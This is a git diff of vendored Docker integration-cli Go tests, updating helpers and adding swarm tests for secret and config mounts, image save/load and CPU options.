c.Assert(strings.TrimSpace(out), checker.Equals, "50000\n100000") - out = inspectField(c, "test", "HostConfig.NanoCpus") - c.Assert(out, checker.Equals, "5e+08", check.Commentf("setting the Nano CPUs failed")) + clt, err := client.NewEnvClient() + c.Assert(err, checker.IsNil) + inspect, err := clt.ContainerInspect(context.Background(), "test") + c.Assert(err, checker.IsNil) + c.Assert(inspect.HostConfig.NanoCPUs, checker.Equals, int64(500000000)) + out = inspectField(c, "test", "HostConfig.CpuQuota") c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS quota should be 0")) out = inspectField(c, "test", "HostConfig.CpuPeriod") c.Assert(out, checker.Equals, "0", check.Commentf("CPU CFS period should be 0")) - out, _, err := dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh") + out, _, err = dockerCmdWithError("run", "--cpus", "0.5", "--cpu-quota", "50000", "--cpu-period", "100000", "busybox", "sh") c.Assert(err, check.NotNil) c.Assert(out, checker.Contains, "Conflicting options: Nano CPUs and CPU Period cannot both be set") } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go index 70139a59bc..688eac684e 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_test.go @@ -1,8 +1,10 @@ package main import ( + "archive/tar" "encoding/json" "fmt" + "io" "io/ioutil" "os" "os/exec" @@ -13,9 +15,11 @@ import ( "strings" "time" - "github.com/docker/distribution/digest" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" + "github.com/opencontainers/go-digest" + "gotest.tools/icmd" ) // save a repo using gz compression and try to load it using stdout @@ -29,17 +33,19 @@ func (s *DockerSuite) TestSaveXzAndLoadRepoStdout(c *check.C) { dockerCmd(c, "inspect", repoName) - repoTarball, _, err := runCommandPipelineWithOutput( + repoTarball, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName), exec.Command("xz", "-c"), exec.Command("gzip", "-c")) c.Assert(err, checker.IsNil, check.Commentf("failed to save repo: %v %v", out, err)) deleteImages(repoName) - loadCmd := exec.Command(dockerBinary, "load") - loadCmd.Stdin = strings.NewReader(repoTarball) - out, _, err = runCommandWithOutput(loadCmd) - c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "load"}, + Stdin: strings.NewReader(repoTarball), + }).Assert(c, icmd.Expected{ + ExitCode: 1, + }) after, _, err := dockerCmdWithError("inspect", repoName) c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after)) @@ -56,7 +62,7 @@ func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) { dockerCmd(c, "inspect", repoName) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName), exec.Command("xz", "-c"), exec.Command("gzip", "-c")) @@ -64,10 +70,12 @@ func (s *DockerSuite) TestSaveXzGzAndLoadRepoStdout(c *check.C) { deleteImages(repoName) - loadCmd := exec.Command(dockerBinary, "load") - loadCmd.Stdin = strings.NewReader(out) - out, _, err = runCommandWithOutput(loadCmd) - c.Assert(err, checker.NotNil, check.Commentf("expected error, but succeeded with no error and output: %v", out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "load"}, + Stdin: strings.NewReader(out), + }).Assert(c, icmd.Expected{ + ExitCode: 1, + }) after, _, err := dockerCmdWithError("inspect", repoName) c.Assert(err, checker.NotNil, check.Commentf("the repo should not exist: %v", after)) @@ -81,7 +89,7 @@ func (s *DockerSuite) TestSaveSingleTag(c *check.C) { out, _ := dockerCmd(c, "images", "-q", "--no-trunc", repoName) cleanedImageID := strings.TrimSpace(out) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", fmt.Sprintf("%v:latest", repoName)), exec.Command("tar", "t"), exec.Command("grep", "-E", fmt.Sprintf("(^repositories$|%v)", cleanedImageID))) @@ -92,15 +100,15 @@ func (s *DockerSuite) TestSaveCheckTimes(c *check.C) { testRequires(c, DaemonIsLinux) repoName := "busybox:latest" out, _ := dockerCmd(c, "inspect", repoName) - data := []struct { + var data []struct { ID string Created time.Time - }{} + } err := json.Unmarshal([]byte(out), &data) c.Assert(err, checker.IsNil, check.Commentf("failed to marshal from %q: err %v", repoName, err)) c.Assert(len(data), checker.Not(checker.Equals), 0, check.Commentf("failed to marshal the data from %q", repoName)) tarTvTimeFormat := "2006-01-02 15:04" - out, _, err = runCommandPipelineWithOutput( + out, err = RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName), exec.Command("tar", "tv"), exec.Command("grep", "-E", fmt.Sprintf("%s %s", data[0].Created.Format(tarTvTimeFormat), digest.Digest(data[0].ID).Hex()))) @@ -158,7 +166,7 @@ func (s *DockerSuite) TestSaveAndLoadRepoFlags(c *check.C) { before, _ := dockerCmd(c, "inspect", repoName) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName), exec.Command(dockerBinary, "load")) c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) @@ -187,7 +195,7 @@ func (s *DockerSuite) TestSaveMultipleNames(c *check.C) { // Make two images dockerCmd(c, "tag", "emptyfs:latest", fmt.Sprintf("%v-two:latest", repoName)) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", fmt.Sprintf("%v-one", repoName), fmt.Sprintf("%v-two:latest", repoName)), exec.Command("tar", "xO", "repositories"), exec.Command("grep", "-q", "-E", "(-one|-two)"), @@ -219,7 +227,7 @@ func (s *DockerSuite) TestSaveRepoWithMultipleImages(c *check.C) { deleteImages(repoName) // create the archive - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", repoName, "busybox:latest"), exec.Command("tar", "t")) c.Assert(err, checker.IsNil, check.Commentf("failed to save multiple images: %s, %v", out, err)) @@ -259,14 +267,11 @@ func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) { os.Mkdir(extractionDirectory, 0777) defer os.RemoveAll(tmpDir) - _, err = buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN adduser -D user && mkdir -p /opt/a/b && chown -R user:user /opt/a - RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`, - true) - c.Assert(err, checker.IsNil, check.Commentf("%v", err)) + RUN touch /opt/a/b/c && chown user:user /opt/a/b/c`)) - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", name), exec.Command("tar", "-xf", "-", "-C", extractionDirectory), ) @@ -304,13 +309,32 @@ func (s *DockerSuite) TestSaveDirectoryPermissions(c *check.C) { } +func listTar(f io.Reader) ([]string, error) { + tr := tar.NewReader(f) + var entries []string + + for { + th, err := tr.Next() + if err == io.EOF { + // end of tar archive + return entries, nil + } + if err != nil { + return entries, err + } + entries = append(entries, th.Name) + } +} + // Test loading a weird image where one of the layers is of zero size. // The layer.tar file is actually zero bytes, no padding or anything else. // See issue: 18170 func (s *DockerSuite) TestLoadZeroSizeLayer(c *check.C) { - testRequires(c, DaemonIsLinux) + // this will definitely not work if using remote daemon + // very weird test + testRequires(c, DaemonIsLinux, SameHostDaemon) - dockerCmd(c, "load", "-i", "fixtures/load/emptyLayer.tar") + dockerCmd(c, "load", "-i", "testdata/emptyLayer.tar") } func (s *DockerSuite) TestSaveLoadParents(c *check.C) { @@ -357,13 +381,11 @@ func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) { name := "saveloadnotag" - _, err := buildImage(name, "FROM busybox\nENV foo=bar", true) - c.Assert(err, checker.IsNil, check.Commentf("%v", err)) - + buildImageSuccessfully(c, name, build.WithDockerfile("FROM busybox\nENV foo=bar")) id := inspectField(c, name, "Id") // Test to make sure that save w/o name just shows imageID during load - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", id), exec.Command(dockerBinary, "load")) c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) @@ -374,7 +396,7 @@ func (s *DockerSuite) TestSaveLoadNoTag(c *check.C) { c.Assert(out, checker.Contains, id) // Test to make sure that save by name shows that name during load - out, _, err = runCommandPipelineWithOutput( + out, err = RunCommandPipelineWithOutput( exec.Command(dockerBinary, "save", name), exec.Command(dockerBinary, "load")) c.Assert(err, checker.IsNil, check.Commentf("failed to save and load repo: %s, %v", out, err)) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go index 22445e5bbe..da520e41c0 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_save_load_unix_test.go @@ -11,9 +11,11 @@ import ( "strings" "time" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" + "github.com/docker/docker/integration-cli/cli/build" "github.com/go-check/check" "github.com/kr/pty" + "gotest.tools/icmd" ) // save a repo and try to load it using stdout @@ -29,11 +31,10 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) { c.Assert(err, check.IsNil) defer os.Remove(tmpFile.Name()) - saveCmd := exec.Command(dockerBinary, "save", repoName) - saveCmd.Stdout = tmpFile - - _, err = runCommand(saveCmd) - c.Assert(err, check.IsNil) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "save", repoName}, + Stdout: tmpFile, + }).Assert(c, icmd.Success) tmpFile, err = os.Open(tmpFile.Name()) c.Assert(err, check.IsNil) @@ -41,11 +42,10 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) { deleteImages(repoName) - loadCmd := exec.Command(dockerBinary, "load") - loadCmd.Stdin = tmpFile - - out, _, err := runCommandWithOutput(loadCmd) - c.Assert(err, check.IsNil, check.Commentf(out)) + icmd.RunCmd(icmd.Cmd{ + Command: []string{dockerBinary, "load"}, + Stdin: tmpFile, + }).Assert(c, icmd.Success) after := inspectField(c, repoName, "Id") after = strings.TrimRight(after, "\n") @@ -67,16 +67,14 @@ func (s *DockerSuite) TestSaveAndLoadRepoStdout(c *check.C) { n, err := pty.Read(buf) c.Assert(err, check.IsNil) //could not read tty output - c.Assert(string(buf[:n]), checker.Contains, "Cowardly refusing", check.Commentf("help output is not being yielded", out)) + c.Assert(string(buf[:n]), checker.Contains, "cowardly refusing", check.Commentf("help output is not being yielded")) } func (s *DockerSuite) TestSaveAndLoadWithProgressBar(c *check.C) { name := "test-load" - _, err := buildImage(name, ` - FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox RUN touch aa - `, true) - c.Assert(err, check.IsNil) + `)) tmptar := name + ".tar" dockerCmd(c, "save", "-o", tmptar, name) diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go index 5a32f2ab93..2c3312d9e9 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_search_test.go @@ -4,7 +4,7 @@ import ( "fmt" "strings" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) @@ -122,10 +122,10 @@ func (s *DockerSuite) TestSearchWithLimit(c *check.C) { c.Assert(outSlice, checker.HasLen, limit+2) // 1 header, 1 carriage return limit = 0 - out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + _, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") c.Assert(err, checker.Not(checker.IsNil)) limit = 200 - out, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") + _, _, err = dockerCmdWithError("search", fmt.Sprintf("--limit=%d", limit), "docker") c.Assert(err, checker.Not(checker.IsNil)) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go index b79fdbeb59..a807e4e7e7 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_create_test.go @@ -8,67 +8,28 @@ import ( "strings" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) -func (s *DockerSwarmSuite) TestSecretCreate(c *check.C) { - d := s.AddDaemon(c, true, true) - - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - - secret := d.getSecret(c, id) - c.Assert(secret.Spec.Name, checker.Equals, testName) -} - -func (s *DockerSwarmSuite) TestSecretCreateWithLabels(c *check.C) { - d := s.AddDaemon(c, true, true) - - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - Labels: map[string]string{ - "key1": "value1", - "key2": "value2", - }, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - - secret := d.getSecret(c, id) - c.Assert(secret.Spec.Name, checker.Equals, testName) - c.Assert(len(secret.Spec.Labels), checker.Equals, 2) - c.Assert(secret.Spec.Labels["key1"], checker.Equals, "value1") - c.Assert(secret.Spec.Labels["key2"], checker.Equals, "value2") -} - // Test case for 28884 func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) { d := s.AddDaemon(c, true, true) - name := "foo" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ + name := "test_secret" + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ Name: name, }, - []byte("foo"), + Data: []byte("foo"), }) c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - fake := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ + fake := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ Name: id, }, - []byte("fake foo"), + Data: []byte("fake foo"), }) c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", fake)) @@ -101,7 +62,7 @@ func (s *DockerSwarmSuite) TestSecretCreateResolve(c *check.C) { // Remove based on ID prefix of the fake one should succeed out, err = d.Cmd("secret", "rm", fake[:5]) - c.Assert(out, checker.Contains, fake) + c.Assert(out, checker.Contains, fake[:5]) out, err = d.Cmd("secret", "ls") c.Assert(err, checker.IsNil) c.Assert(out, checker.Not(checker.Contains), name) @@ -126,6 +87,6 @@ func (s *DockerSwarmSuite) TestSecretCreateWithFile(c *check.C) { c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out)) id := strings.TrimSpace(out) - secret := d.getSecret(c, id) + secret := d.GetSecret(c, id) c.Assert(secret.Spec.Name, checker.Equals, testName) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go deleted file mode 100644 index 0985a2bd59..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_secret_inspect_test.go +++ /dev/null @@ -1,68 +0,0 @@ -// +build !windows - -package main - -import ( - "encoding/json" - - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSwarmSuite) TestSecretInspect(c *check.C) { - d := s.AddDaemon(c, true, true) - - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - - secret := d.getSecret(c, id) - c.Assert(secret.Spec.Name, checker.Equals, testName) - - out, err := d.Cmd("secret", "inspect", testName) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - var secrets []swarm.Secret - c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil) - c.Assert(secrets, checker.HasLen, 1) -} - -func (s *DockerSwarmSuite) TestSecretInspectMultiple(c *check.C) { - d := s.AddDaemon(c, true, true) - - testNames := []string{ - "test0", - "test1", - } - for _, n := range testNames { - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: n, - }, - []byte("TESTINGDATA"), - }) - c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - - secret := d.getSecret(c, id) - c.Assert(secret.Spec.Name, checker.Equals, n) - - } - - args := []string{ - "secret", - "inspect", - } - args = append(args, testNames...) - out, err := d.Cmd(args...) - c.Assert(err, checker.IsNil, check.Commentf(out)) - - var secrets []swarm.Secret - c.Assert(json.Unmarshal([]byte(out), &secrets), checker.IsNil) - c.Assert(secrets, checker.HasLen, 2) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go index 9e8b1e9956..d690b7e45f 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_create_test.go @@ -5,33 +5,34 @@ package main import ( "encoding/json" "fmt" + "path/filepath" "strings" "github.com/docker/docker/api/types" "github.com/docker/docker/api/types/mount" "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) func (s *DockerSwarmSuite) TestServiceCreateMountVolume(c *check.C) { d := s.AddDaemon(c, true, true) - out, err := d.Cmd("service", "create", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top") + out, err := d.Cmd("service", "create", "--no-resolve-image", "--detach=true", "--mount", "type=volume,source=foo,target=/foo,volume-nocopy", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) id := strings.TrimSpace(out) var tasks []swarm.Task waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - tasks = d.getServiceTasks(c, id) + tasks = d.GetServiceTasks(c, id) return len(tasks) > 0, nil }, checker.Equals, true) task := tasks[0] waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { - if task.NodeID == "" || task.Status.ContainerStatus.ContainerID == "" { - task = d.getTask(c, task.ID) + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) } - return task.NodeID != "" && task.Status.ContainerStatus.ContainerID != "", nil + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil }, checker.Equals, true) // check container mount config @@ -67,15 +68,15 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) { serviceName := "test-service-secret" testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ Name: testName, }, - []byte("TESTINGDATA"), + Data: []byte("TESTINGDATA"), }) c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", testName, "busybox", "top") + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--secret", testName, "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) @@ -90,23 +91,91 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSimple(c *check.C) { c.Assert(refs[0].File.Name, checker.Equals, testName) c.Assert(refs[0].File.UID, checker.Equals, "0") c.Assert(refs[0].File.GID, checker.Equals, "0") + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + d.DeleteSecret(c, testName) } -func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) { +func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTargetPaths(c *check.C) { d := s.AddDaemon(c, true, true) - serviceName := "test-service-secret" - testName := "test_secret" - id := d.createSecret(c, swarm.SecretSpec{ - swarm.Annotations{ - Name: testName, + testPaths := map[string]string{ + "app": "/etc/secret", + "test_secret": "test_secret", + "relative_secret": "relative/secret", + "escapes_in_container": "../secret", + } + + var secretFlags []string + + for testName, testTarget := range testPaths { + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA " + testName + " " + testTarget), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) + + secretFlags = append(secretFlags, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + } + + serviceName := "svc" + serviceCmd := []string{"service", "create", "--detach", "--no-resolve-image", "--name", serviceName} + serviceCmd = append(serviceCmd, secretFlags...) + serviceCmd = append(serviceCmd, "busybox", "top") + out, err := d.Cmd(serviceCmd...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.SecretReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, len(testPaths)) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, serviceName) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + for testName, testTarget := range testPaths { + path := testTarget + if !filepath.IsAbs(path) { + path = filepath.Join("/run/secrets", path) + } + out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "TESTINGDATA "+testName+" "+testTarget) + } + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithSecretReferencedTwice(c *check.C) { + d := s.AddDaemon(c, true, true) + + id := d.CreateSecret(c, swarm.SecretSpec{ + Annotations: swarm.Annotations{ + Name: "mysecret", }, - []byte("TESTINGDATA"), + Data: []byte("TESTINGDATA"), }) c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id)) - testTarget := "testing" - out, err := d.Cmd("service", "create", "--name", serviceName, "--secret", fmt.Sprintf("source=%s,target=%s", testName, testTarget), "busybox", "top") + serviceName := "svc" + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--secret", "source=mysecret,target=target1", "--secret", "source=mysecret,target=target2", "busybox", "top") c.Assert(err, checker.IsNil, check.Commentf(out)) out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName) @@ -114,31 +183,199 @@ func (s *DockerSwarmSuite) TestServiceCreateWithSecretSourceTarget(c *check.C) { var refs []swarm.SecretReference c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 2) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, serviceName) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + for _, target := range []string{"target1", "target2"} { + c.Assert(err, checker.IsNil, check.Commentf(out)) + path := filepath.Join("/run/secrets", target) + out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "TESTINGDATA") + } + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithConfigSimple(c *check.C) { + d := s.AddDaemon(c, true, true) + + serviceName := "test-service-config" + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--config", testName, "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.ConfigReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) c.Assert(refs, checker.HasLen, 1) - c.Assert(refs[0].SecretName, checker.Equals, testName) + c.Assert(refs[0].ConfigName, checker.Equals, testName) c.Assert(refs[0].File, checker.Not(checker.IsNil)) - c.Assert(refs[0].File.Name, checker.Equals, testTarget) + c.Assert(refs[0].File.Name, checker.Equals, testName) + c.Assert(refs[0].File.UID, checker.Equals, "0") + c.Assert(refs[0].File.GID, checker.Equals, "0") + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) + d.DeleteConfig(c, testName) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithConfigSourceTargetPaths(c *check.C) { + d := s.AddDaemon(c, true, true) + + testPaths := map[string]string{ + "app": "/etc/config", + "test_config": "test_config", + "relative_config": "relative/config", + } + + var configFlags []string + + for testName, testTarget := range testPaths { + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA " + testName + " " + testTarget), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + configFlags = append(configFlags, "--config", fmt.Sprintf("source=%s,target=%s", testName, testTarget)) + } + + serviceName := "svc" + serviceCmd := []string{"service", "create", "--detach", "--no-resolve-image", "--name", serviceName} + serviceCmd = append(serviceCmd, configFlags...) + serviceCmd = append(serviceCmd, "busybox", "top") + out, err := d.Cmd(serviceCmd...) + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.ConfigReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, len(testPaths)) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, serviceName) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" && task.Status.ContainerStatus != nil, nil + }, checker.Equals, true) + + for testName, testTarget := range testPaths { + path := testTarget + if !filepath.IsAbs(path) { + path = filepath.Join("/", path) + } + out, err := d.Cmd("exec", task.Status.ContainerStatus.ContainerID, "cat", path) + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Equals, "TESTINGDATA "+testName+" "+testTarget) + } + + out, err = d.Cmd("service", "rm", serviceName) + c.Assert(err, checker.IsNil, check.Commentf(out)) +} + +func (s *DockerSwarmSuite) TestServiceCreateWithConfigReferencedTwice(c *check.C) { + d := s.AddDaemon(c, true, true) + + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: "myconfig", + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + serviceName := "svc" + out, err := d.Cmd("service", "create", "--detach", "--no-resolve-image", "--name", serviceName, "--config", "source=myconfig,target=target1", "--config", "source=myconfig,target=target2", "busybox", "top") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Configs }}", serviceName) + c.Assert(err, checker.IsNil) + + var refs []swarm.ConfigReference + c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil) + c.Assert(refs, checker.HasLen, 2) + + var tasks []swarm.Task + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + tasks = d.GetServiceTasks(c, serviceName) + return len(tasks) > 0, nil + }, checker.Equals, true) + + task := tasks[0] + waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) { + if task.NodeID == "" || task.Status.ContainerStatus == nil { + task = d.GetTask(c, task.ID) + } + return task.NodeID != "" 